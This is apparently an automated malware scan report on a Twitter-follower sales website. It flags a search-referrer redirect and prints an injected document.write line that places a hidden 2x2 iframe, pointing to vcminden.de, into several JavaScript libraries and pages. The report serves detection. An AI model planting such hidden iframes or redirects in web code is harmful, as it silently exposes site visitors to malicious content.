Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.purchasefollowersontwitter.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.purchasefollowersontwitter.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 14 Oct 2015 13:08:34 GMT Location: http://vcminden.de/mzmd.html?h=1546115 Server: Apache Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.purchasefollowersontwitter.com/ | 200 OK Content-Length: 42702 Content-Type: text/html | clean |
http://www.purchasefollowersontwitter.com/js/jquery-latest.js | 200 OK Content-Length: 120774 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1546115></iframe>');
(function(){ var window = this, undefined, _jQuery = window.jQuery, _$ = window.$, jQuery = window.jQuery = window.$ = function( selector, context ) { return new jQuery.fn.init( selector, context ); }, quickExpr = /^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/, document.body["offset" + name], document.documentElement["offset" + name] ) : // Get or set width or height on the element size === undefined ? // Get width or height on the element (this.length ? jQuery.css( this[0], type ) : null) : // Set the width or height on the element (default to pixels if value is unitless) this.css( type, typeof size === "string" ? size : size + "px" ); }; }); })(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=1546115 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1546115> | ||
http://www.purchasefollowersontwitter.com/js/thickbox.js | 200 OK Content-Length: 11782 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1546115></iframe>');
var tb_pathToImage = "images/loadingAnimation.gif"; $(document).ready(function(){ tb_init('a.thickbox, area.thickbox, input.thickbox'); imgLoader = new Image(); imgLoader.src = tb_pathToImage; }); function tb_init(domChunk){ $(domChunk).click(function(){ var t = this.title || this.nam var h = window.innerHeight || self.innerHeight || (de&&de.clientHeight) || document.body.clientHeight; arrayPageSize = [w,h]; return arrayPageSize; } function tb_detectMacXFF() { var userAgent = navigator.userAgent.toLowerCase(); if (userAgent.indexOf('mac') != -1 && userAgent.indexOf('firefox')!=-1) { return true; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=1546115 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1546115> | ||
http://www.purchasefollowersontwitter.com/js/flowplayer-3.2.6.min.js | 200 OK Content-Length: 16971 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1546115></iframe>');
(function(){function g(o){console.log("$f.fireEvent",[].slice.call(o))}function k(q){if(!q||typeof q!="object"){return q}var o=new q.constructor();for(var p in q){if(q.hasOwnProperty(p)){o[p]=k(q[p])}}return o}function m(t,q){if(!t){return}var o,p=0,r=t.length;if(r===undefined){for(o in t){if(q.call(t[o],o,t[o])===false){b Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=1546115 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1546115> | ||
http://www.purchasefollowersontwitter.com/index.html | 200 OK Content-Length: 42702 Content-Type: text/html | clean |
http://www.purchasefollowersontwitter.com/Services.html | 200 OK Content-Length: 23415 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=1546115 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=1546115> | ||
http://feed2js.org//feed2js.php?src=http%3A%2F%2Fwww.purchasefollowersontwitter.com%2Fblog%2F%3Ffeed%3Drss2&num=10&desc=500>1&utf=y/ | 200 OK Content-Length: 7729 Content-Type: application/x-javascript | clean |
http://www.purchasefollowersontwitter.com/FAQ.html | 200 OK Content-Length: 26118 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=1546115 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=1546115> | ||
http://www.purchasefollowersontwitter.com/Contact.html | 200 OK Content-Length: 25040 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=1546115 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=1546115> | ||
http://www.purchasefollowersontwitter.com/blog | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 14 Oct 2015 13:08:44 GMT Location: http://www.purchasefollowersontwitter.com/blog/ Server: Apache Content-Length: 339 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.purchasefollowersontwitter.com/blog/ | 200 OK Content-Length: 42345 Content-Type: text/html | clean |
http://www.purchasefollowersontwitter.com/blog/wp-content/themes/twentytwelve/js/navigation.js?ver=1.0 | 200 OK Content-Length: 895 Content-Type: application/javascript | clean |
http://www.purchasefollowersontwitter.com/blog/sample-page/ | 200 OK Content-Length: 5096 Content-Type: text/html | clean |
http://www.purchasefollowersontwitter.com/test404page.js | 404 Not Found Content-Length: 442 Content-Type: text/html | clean |
http://www.purchasefollowersontwitter.com/blog/the-5-ultimate-research-tools-for-twitter/ | 200 OK Content-Length: 8901 Content-Type: text/html | clean |
http://www.purchasefollowersontwitter.com/blog/category/uncategorized/ | 200 OK Content-Length: 8905 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=purchasefollowersontwitter.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://purchasefollowersontwitter.com/
Result: purchasefollowersontwitter.com is not infected or malware details are not published yet.
Result: purchasefollowersontwitter.com is not infected or malware details are not published yet.